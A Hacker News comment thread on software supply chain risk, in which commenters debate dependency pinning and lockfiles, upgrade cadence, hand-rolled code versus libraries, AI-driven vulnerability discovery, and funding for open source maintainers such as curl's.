Maybe you shouldn't install new software for a bit
xeiaso.net557 points by psxuaw 12 hours ago
557 points by psxuaw 12 hours ago
This was always a nightmare waiting to happen. The sheer mass of packages and the consequent vast attack surface for supply chain attacks was always a problem that was eventually going to blow up in everyone's face.
But it was too convenient. Anyone warning about it or trying to limit the damage was shouted down by people who had no experience of any other way of doing things. "import antigravity" is just too easy to do without.
Well, now we're reaching the "find out" part of the process I guess.
I worked for one company where we were super conservative. Every external component was versioned. Nothing was updated without review and usually after it had plenty of soak time. Pretty much everything built from source code (compilers, kernel etc.). Builds [build servers/infra] can't reach the Internet at all and there's process around getting any change in. We reviewed all relevant CVEs as they came out to make a call on if they apply to us or not and how we mitigate or address them.
Then I moved to another company where we had builds that access the Internet. We upgrade things as soon as they come out. And people think this is good practice because we're getting the latest bug fixes. CVEs are reviewed by a security team.
Then a startup with a mix of other practices. Some very good. But we also had a big CVE debt. e.g. we had secure boots on our servers and encrypted drives. We had a pretty good grasp on securing components talking to each other etc.
Everyone seems to think they are doing the right thing. It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues. We as an industry could really use a better set of practices. Example #1 for me is better in terms of dependency management. In general company #1 had well established security practices and we had really secure products.
I would rather work with a company that updates continuously, while also building security into multiple layers so that weaknesses in one layer can be mitigated by others.
For example, at one company I worked for, they created an ACL model for applications that essentially enforced rules like: “Application X in namespace A can communicate with me.” This ACL coordinated multiple technologies working together, including Kubernetes NetworkPolicies, Linkerd manifests with mTLS, and Entra ID application permissions. As a user, it was dead simple to use and abstracted away a lot of things i do not know that well.
The important part is not the specific implementation, but the mindset behind it.
An upgrade can both fix existing issues and introduce new ones. However, avoiding upgrades can create just as many problems — if not more — over time.
At the same time, I would argue that using software backed by a large community is even more important today, since bugs and vulnerabilities are more likely to receive attention, scrutiny, and timely fixes.
You forgot case #4: Worked at a startup where the frontend team thought it was a good idea to use lock files during development, but to do a "fresh" install of all dependecies during the deployment step.
And yes, they still thought they were doing the right thing.
To be fair npm makes (made?) it weirdly hard to use lock files so a lot of people did that by mistake. And when you do use lock, it reinstalls every time so a retagged package can just silently update.
doesn't `npm ci` prevent that? it fails if something doesn't match the lockfile, and wipes node_modules before running
this is on some ancient node 16 build i was trying to clean up ci for, so not very recent npm
FYI a retagged package would result in a different SHA512 integrity sum and fail the installation process. It won't "just silently update".
Anyway, the point of parent and me wasn't that it was considered to be a "mistake", but people thinking they "are doing the right thing".
I can’t comment on the behavior of ancient npm versions, but with modern npm I would not even know how to skip using a lockfile.
As for the parent comment about not using the lockfile for the production build, that’s just incredibly incompetent.
Maybe they should hire someone who knows what they are doing. Contrary to the popular beliefs of backend engineers online, you also need some competency to do frontend properly.
In this case what’s needed is „npm ci“ instead of „npm install“ or better „pnpm install —frozen-lockfile“.
Pnpm will also do that automatically if the CI environment variable is set.
> Everyone seems to think they are doing the right thing
I like to think people would agree more on the appropriate method if they saw the risk as large enough.
If you could convince everyone that a nuclear bomb would get dropped on their heads (or a comparably devastating event) if a vulnerability gets in, I highly doubt a company like #2 would still believe they're doing things optimally, for example.
> if they saw the risk as large enough.
If you expose people to the true risks instead of allowing them to be ignorant, the conclusion that they might come to is that they shouldn’t develop software at all.
Really? You think the alternate mode where you're running 5-year-old versions of stuff with tons of known security flaws is better?
What part of "We reviewed all relevant CVEs as they came out to make a call on if they apply to us or not and how we mitigate or address them" gave you that impression?
>running 5-year-old versions of stuff with tons of known security flaws
No one in this thread proposed that, or anything that could be reasonably assumed to have meant that.
> It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues
I would count myself as a "frequent upgrader" - I admin a bunch of Ubuntu machines and typically set them to auto-update each night. However, I am aware of the risks of introducing new issues, but that's offset by the risks of not upgrading when new bugs are found and patched. There's also the issue of organisations that fall far behind on versions of software which then creates an even bigger problem, though this is more common with Windows/proprietary software as you have less control over that. At least with Linux, you can generally find ways to install e.g. old versions of Java that may be required for specific tools.
There's no simple one-size-fits-all and it depends on the organisation's pool of skills as to whether it's better to proactively upgrade or to reluctantly upgrade at a slower pace. In my experience, the bugs introduced by new versions of software are easier to fix/workaround than the various issues of old software versions.
So, to play Pandora, what if the net effect of uncovering all these unknown attack vectors is it actually empties the holsters of every national intelligence service around the world? Just an idea I have been playing with. Say it basically cleans up everything and everyone looking for exploits has to start from scratch except “scratch” is now a place where any useful piece of software has been fuzz tested, property tested and formally verified.
Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.
TBH this is a pretty good way of looking at it. Yeah we're seeing an explosion of vulnerabilities being found right now, but that (hopefully) means those vulnerabilities are all being cleaned up and we're entering a more hardened era of software. Minus the software packages that are being intentionally put out as exploits, of course. Maybe some might say it's too optimistic and naive, but I think you have a good point.
I agree with the prediction but not the timing. We won't enter a more hardened era of software until after a long period of security vulnerabilities.
Rivers caught on fire for a hundred years before the EPA was formed.
New code will also use these tools from the get go, hopefully vastly reducing the vulnerabilities that make it to prod to begin with.
The future may be distributed quite unevenly here, as they say, with a divergence between a small amount of "responsible" code in systems which leverage AI defensively, and a larger amount of vibe-coded / prompt-engineered code in systems which don't go through the extra trouble, and in fact create additional risk by cutting corners on human review. I personally know a lot of people using AI to create software faster, but none of them have created special security harnesses a la Mozilla (https://arstechnica.com/information-technology/2026/05/mozil...).
> we're entering a more hardened era of software
This is one force that operates. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have turned to an open source library.
I think the effect will generally be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OS library; there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did. But the vulnerabilities will have much narrower scope: If you successfully exploit an OS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economic incentive of funding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".
If I hand roll my logging library, I unlikely include automatic LDAP request based on message text (infamous Log4j vulnerability).
I’m seeing a lot of similar things during code reviews of substantially LLM-produced codebases now. Half-baked bad idea that probably leaked from training sets.
Typically when hand-rolling code you implement only what you require for your use-case, while a library will be more general purpose. As a consequence of doing more, have more code and more bugs.
Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge doses properly.
For supply chain security and bug count, I'll take a focused custom implementation of specific features over a library full of generalized functionality.
Yes, a lot hinges on how little you can get away with implementing for your use case. If you have an XML config file with 3 settings in it, you probably won't need to implement handling of external entities the way a full XML parsing library would, which will close off an entire class of attendant vulnerabilities.
> Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge doses properly.
This isn't really an argument in favour of having the average programmer reimplement stuff, though. For it to be, you'd have to argue that the leftpad author was unusually sloppy. That may be true in this specific case, but in general, I'm not persuaded that the average OSS author is worse than the average programmer overall. IMHO, contributing your work to an OSS ecosystem is already a mild signal of competence.
On the wider topic of reimplementation: Recently there was an article here about how the latest Ubuntu includes a bunch of coreutils binaries that have been rewritten in Rust. It turns out that, while this presumably reduced the number of memory corruption bugs (there was still one, somehow; I didn't dig into it), it introduced a bunch of new vulnerabilities, mostly caused by creating race conditions between checking a filesystem path and using the path for something.
This argument goes even further. If you have only 3 settings, why does it need to be an xml file?
ETA: I'm not saying it has to, I'm saying it's possible to imagine reasons that would justify this decision in some cases.
Because it might grow in future and you want to allow flexibility for that, because it might be the input to or output from some external system that requires XML, because your team might have standardised on always using XML config files, because introducing yet another custom plain text file format just creates unnecessary cognitive load for everyone who has to use it are real-world reasons I can think of.
But really I was just looking for a concrete example where I know the complexity of the implementation has definitely caused vulnerabilities, whether or not the choice to use it to solve the problem at hand was sensible. I have zero love for XML.
>there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did
Have you read this old code? It's terrible and written with no care at all to security often in C. AI is much much better at writing code.
Do you have a specific library in mind? I think it would have to be an ancient, unmaintained C library.
But I think most OSS code isn't like this -- even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel, GNU userland, PostgreSQL, Python.
> even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel
There have been two LPE vulnerability and exploits in the Linux kernel announced today. After the one announced just last week. I don't think as much of the C code born long ago has been as carefully hardened as you think.
(Copy Fail 2 and Dirty Frag today, and Copy Fail last week)
One. "Copy Fail 2" and "Dirty Frag" are the same thing.
And consideing the size of the kenel, I call this stupendously good.
You (anyone, not you personally) write that much code yourself and let's see how well you did in comparison.
Sure, I didn't mean to say that these examples are guaranteed 100% safe -- just that I trust them to be enormously more safe than software that accomplishes the same task that was hand-written by either a human or an an LLM last week.
You are avoiding intentionally to say ‘thanks to LLMs’ or is implicit? As all these recent mega bugs surface with lots of fuzzing and agentic bashing, right ?
Thank you for reminding us all that you AI bros are still the most obnoxious people there are.
Having casually read into a few recent incidents the vector has often been outside of software. A lot of mis-configurations or simply attacking the human in the chain. And nation states have basically unbounded resources for everything from bribes, insiders, and even standing up entire companies.
I think it will be an arms race in the future as well. Easier to fix known vulnerabilities automatically, but also easier to find new ones and the occasionally AI fuckup instead of the occasionally human fuckup.
Yeah.
Right now it kinda feels to me like "Open Source" is the Russian army, assuming their sheer numbers and their huge quantity of equipment much off which is decades old.
Meanwhile attackers and bug hunters are like the Ukrainians, using new, inexpensive, and surprisingly powerful tools that none of the Open Source community has ever seen in the past, and for which it has very little defence capability.
The attackers with cheap drones or LLMs are completely overwhelming the old school who perhaps didn't notice how quickly the world has changed around them, or did notice but cannot do anything about quickly enough.
Well this argument was certainly inventive. What a weird impression to have about these things.
Who exactly is the innocent little Ukraine supposed to be that the big bad open source is supposed to be attacking to, what? take their land and make the OSS leader look powerful and successful at acheiving goals to distract from their fundamental awfulness? And who are the North Korean canon fodder purchased by OSS while we're at it?
Yeah it's just like that, practically the same situation. The authors of gnu cp and ls can't wait to get, idk, something apparently, out of the war they started when they attacked, idk, someone apparently.
New software is being generated faster than it can be adequately tested. We are in the same place we’ve always been; except everything is moving much too fast.
This is exactly the feeling I have. First: excessive growth of dependencies fueled by free components.
* with internet access to FOSS via sourceforge and github we got an abundance of building blocks
* with central repositories like CPAN, npm, pip, cargo and docker those building blocks became trivially easy to use
Then LLMs and agents added velocity to building apps and producing yet more components, feeding back into the dependency chain. Worse: new code with unattributed reuse of questionable patterns found in unknowable versions of existing libraries. That is, implicit dependencies on fragments multitude of packages.
This may all end well ultimately, but we're definitely in for a bumpy ride.
This assumes that there are no new exploits being generated.
We're seeing maintainers retreat from maintaining because the amount of AI slop being pushed at them is too much. How many are just going to hand over the maintenance burden to someone else, and how many of those new maintainers are going to be evil?
The essential problem is that our entire system of developing civilisation-critical software depends on the goodwill of a limited set of people to work for free and publish their work for everyone else to use. This was never sustainable, or even sensible, but because it was easy we based everything on it.
We need to solve the underlying problem: how to sustainably develop and maintain the software we need.
A large part of this is going to have to be: companies that use software to generate profits paying part of those profits towards the development and maintenance of that software. It just can't work any other way. How we do this is an open question that I have no answers for.
That is already how it works. The loner hacker in moms basement working for free on his super critical OSS package is largely a myth. The vast majority of OSS code is contributed by companies paying their employees to work on it.
I'm thinking of projects like curl [0]
this is a cornerstone of modern software development. If it died, or if got taken over by a malicious entity, every single company on the planet would have an immediate security problem. Yet the experience of that maintainer is bad verging on terrible [1].
We need to do better than this.
>As an example, he put up a slide listing the 47 car brands that use curl in their products; he followed it with a slide listing the brands that contribute to curl. The second slide, needless to say, was empty.
>He emphasized that he has released curl under a free license, so there is no legal problem with what these companies are doing. But, he suggested, these companies might want to think a bit more about the future of the software they depend on.
There is little reason for minimal-restriction licenses to exist other than to allow corporate use without compensation or contribution. I would think by now that any hope that they would voluntarily be any less exploitative than they can would have been dashed.
If you aren't getting paid or working purely for your own benefit, use a protective license. Though, if thinly veiled license violation via LLM is allowed to stand, this won't be enough.
There is a lot of opposition in the FOSS community for restrictive/protective licenses. And to be fair, this comes from a consistent and entirely logical worldview.
There's a bunch of problems with getting companies to pay for this, too - that sense of entitlement (or even contractual obligation), the ability to control the project with cash, etc.
I don't have any answers or solutions. But I don't think we can hand-wave the problem away.
The problem is that they get away too easily with bugs in their products they ship to customers. If this would come with some penalties, there would be some incentive to invest in security and this would probably often flow back to upstream projects.